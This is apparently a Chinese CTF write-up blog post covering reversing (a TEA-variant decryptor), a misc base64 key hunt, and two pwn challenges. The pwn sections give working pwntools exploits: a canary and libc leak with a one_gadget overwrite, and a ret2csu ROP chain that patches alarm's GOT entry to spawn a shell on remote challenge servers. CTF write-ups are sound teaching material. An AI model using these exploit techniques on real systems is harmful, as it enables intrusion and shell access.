      /* TEA-style block decryption with a custom delta (0x81A5692e) and 33
       * rounds.  v is one 64-bit block as two uint32 words, k the 128-bit key
       * as four words, z the block index: each block starts from its own
       * running sum delta*33*(z+1), so consecutive blocks see different round
       * constants.  All arithmetic is uint32 and wraps modulo 2^32. */
      const uint32_t delta = 0x81A5692e;
      uint32_t sum = delta * 33 * (z + 1);
      uint32_t a = v[0];
      uint32_t b = v[1];
      int round;

      for (round = 0; round < 33; round++) {
        b -= ((a << 4) + k[2]) ^ (a + sum) ^ ((a >> 5) + k[3]);
        a -= ((b << 4) + k[0]) ^ (b + sum) ^ ((b >> 5) + k[1]);
        sum -= delta;
      }
      v[0] = a;
      v[1] = b;
    }
    
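    int main(void)
    {
        /* The four key words recovered from the dynamic trace. */
        uint32_t key[] = {0x7CE45630, 0x58334908, 0x66398867, 0x0C35195B1};
        /* 40 ciphertext bytes dumped from the binary (five 8-byte blocks).
         * The array is one byte longer than the data so the decrypted text is
         * always NUL-terminated before printf("%s"); the original printed a
         * 40-byte int8_t buffer with no terminator, reading past the array
         * whenever the plaintext itself does not end in a NUL. */
        unsigned char ida_chars[41] = {0xED, 0x1D, 0x2F, 0x42, 0x72, 0xE4, 0x85, 0x14, 0xD5, 0x78, 0x55, 0x03, 0xA2, 0x80, 0x6B, 0xBF, 0x45, 0x72, 0xD7, 0x97, 0xD1, 0x75, 0xAE, 0x2D, 0x63, 0xA9, 0x5F, 0x66, 0x74, 0x6D, 0x2E, 0x29, 0xC1, 0xFC, 0x95, 0x97, 0xE9, 0xC8, 0xB5, 0x0B};
        uint32_t block[2];
        int i;

        /* Decrypt each 8-byte block in place; i/8 is the block index that
         * selects the per-block starting sum inside decrypt().  The original
         * loop condition `i < 40, j < 5` used the comma operator, so the first
         * test was evaluated and discarded; one counter suffices.  memcpy
         * avoids casting the byte array to uint32_t*, which is not
         * alignment/aliasing-safe in strict C. */
        for (i = 0; i < 40; i += 8) {
            memcpy(block, ida_chars + i, sizeof block);
            decrypt(block, key, i / 8);
            memcpy(ida_chars + i, block, sizeof block);
        }

        printf("%s\n", (char *)ida_chars);
        return 0;
    }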
    
    

    虚假的粉丝

    我还以为是misc,ida分析

    内容比较简单,先找到密钥,密钥是藏在文件里面,需要找到符合条件的那个文件

    root@kali:~/LibcSearcher# grep -E "U.{38}S" *.txt
    ASCII-faded 4157.txt:aaZ8088aaZ88B008BBBBB8888Z088Z8ZZZaX8@WBWW@W@W@W@W@WWWWBWBBB@@UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNSWMa  ............,.,.,.,,,,:
    

    然后取前40位

    UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNS
    

    base64和url解码后得到

    S3Cre7_K3y = Al4N_wAlK3R
    

    然后运行程序,输入文件名,偏移,字符串长度,密钥,得到解密后的5315.txt,得到flag

    pwn

    string_go

        Arch:     amd64-64-little
        RELRO:    Full RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      PIE enabled
    

    64位程序,保护全开(c++伪代码看起来很费劲)

    这里没有检查输入的值的大小,输入为-1即可溢出

    但是保护全开,得先泄露一下canary

    from pwn import *
    
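    context(os = "linux", arch = "amd64",log_level= "debug")
    context.terminal = ['tmux', 'splitw', '-h']

    #r = process(['/root/LibcSearcher/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/ld-2.27.so','./string_go_libc-2.27.so'],env={'LD_PRELOAD':'/root/LibcSearcher/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so'})
    r = remote('82.157.20.104',xxxx)   # port redacted in the writeup (xxxx is a placeholder, not a valid name)

    # Menu interaction as described above: the length prompt takes -1 without a
    # bounds check, so the following read runs past the buffer.
    r.recvuntil('>>> ')
    r.sendline('1+2')
    r.recvuntil('>>> ')
    r.sendline('-1')
    r.recvuntil('>>> ')
    r.sendline('hhh')
    r.recvuntil('>>> ')
    r.sendline('1')

    # Leaked bytes: 0x28 of padding, a libc pointer, one skipped qword, then the
    # canary.  0x730157 is that pointer's offset inside the libc the author
    # used (the 2.27 build named in the commented process() line); it differs
    # between libc builds.
    r.recv(0x28)
    libc_base = u64(r.recv(8)) - 0x730157      # the original had a stray '=' here (SyntaxError)
    r.recv(8)
    canary = u64(r.recv(8))
    one_gadget = libc_base + 0x4f3d5
    # bytes, not str: p64() returns bytes and str + bytes raises TypeError on Python 3.
    payload = b'a'*0x18 + p64(canary) + b'a'*0x18 + p64(one_gadget)

    r.sendline(payload)

    #gdb.attach(r)
    r.interactive()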
    

    blind

        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)
    

    只开启nx保护,程序很简单

    ssize_t __fastcall main(__int64 a1, char **a2, char **a3)
    {
      char buf; // [rsp+0h] [rbp-50h]   -- buffer sits 0x50 bytes below the saved rbp

      setvbuf(stdin, 0LL, 2, 0LL);
      setvbuf(stdout, 0LL, 2, 0LL);
      setvbuf(stderr, 0LL, 2, 0LL);
      alarm(8u);   // 8-second watchdog; the only libc function besides read/sleep the binary calls
      sleep(3u);
      // Reads up to 0x500 bytes into a 0x50-byte stack frame with no length
      // check: a plain stack overflow, and with no canary and no PIE (checksec
      // above) nothing stops the return address from being overwritten.
      // A bounded read (sizeof buf) is the fix the challenge deliberately omits.
      return read(0, &buf, 0x500uLL);
    }
    

    没有后门函数,也没有相关的输出函数,但是存在alarm函数,这个是个突破口,看一下寄存器,可以构造特定的payload,因为alarm和syscall地址就差了5,可以修改一个字节,让alarm地址变为syscall,然后传入rax

    但是不同版本的libc中,alarm的最低字节是不一样的,除非爆破;提示说不用爆破。。可能存在更简单的解法吧

    from pwn import *
    
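    context(os = "linux", arch = "amd64",log_level= "debug")
    context.terminal = ['tmux', 'splitw', '-h']

    #r = process('./blind')
    # The original passed '"82.157.6.165"' — quote characters inside the string —
    # which is not a resolvable host name.  The port is redacted in the writeup.
    r = remote('82.157.6.165', xxx)
    elf = ELF('./blind')
    read_got = elf.got['read']
    alarm_got = elf.got['alarm']
    # Fixed addresses are usable because the binary is not PIE (checksec above).
    # pop/mov are the two gadgets chained by makepayload() below; bss is the
    # scratch area the chain writes "/bin/sh" into.
    pop = 0x4007BA
    mov = 0x4007A0
    bss = 0x601088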
    
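    def makepayload(rbx, rbp, r12, r13, r14, r15):
        """Build one link of the ROP chain as bytes.

        Layout: the `pop` gadget followed by the six register values it pops,
        then the `mov` gadget, then 0x38 bytes of padding the author places
        after it.  Every piece is bytes; the original used 'a'*0x38 (a str),
        which cannot be concatenated with p64()'s bytes on Python 3.
        """
        payload = p64(pop) + p64(rbx) + p64(rbp)
        payload += p64(r12)
        payload += p64(r13) + p64(r14) + p64(r15)
        payload += p64(mov)
        payload += b'a' * 0x38
        return payload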
    
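    # Padding covers the 0x50-byte buffer and the saved rbp; the chain starts
    # at the return address.  All literals are bytes so they concatenate with
    # the p64() output from makepayload() on Python 3 (the original mixed str).
    payload = b'a'*(0x50+8)
    payload += makepayload(0,1,r12=read_got,r13=1,r14=alarm_got,r15=0)
    payload += makepayload(0,1,r12=read_got,r13=59,r14=bss,r15=0)
    payload += makepayload(0,1,r12=alarm_got,r13=0,r14=0,r15=bss)

    # main() reads exactly 0x500 bytes, so pad the request to that size.
    payload += b'\x00'*(0x500-len(payload))
    r.send(payload)
    # One byte for the author's libc build; the commented value is the other
    # build they tried (see the note above about libc differences).
    #r.send('\x15')
    r.send(b'\xd5')
    r.send(b'/bin/sh\x00' + b'a'*(59-8))
    #gdb.attach(r)
    r.interactive()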
    

    code_project

    未解开

    easykernel

    内核题,未解开

    SimpleDecoder

    未解开

    TinyNote

    未解开

    web

    灏妹的web

    扫描目录得到: /.idea/dataSources.xml

    访问得到flag

    其他

    非web选手,见其他师傅wp

    作者:寒江寻影
    本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利。
  • 原文地址:https://www.cnblogs.com/crfshadow/p/15596478.html